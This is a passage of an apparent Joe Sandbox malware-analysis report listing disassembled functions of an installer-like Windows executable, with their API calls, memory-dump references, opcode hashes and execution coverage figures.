                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                        Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042795A,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                        Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                        • String ID: Version
                                                                                                                                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                        Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                        Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                        Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                        Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                        Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                        Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                        Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:3.5%
                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:45
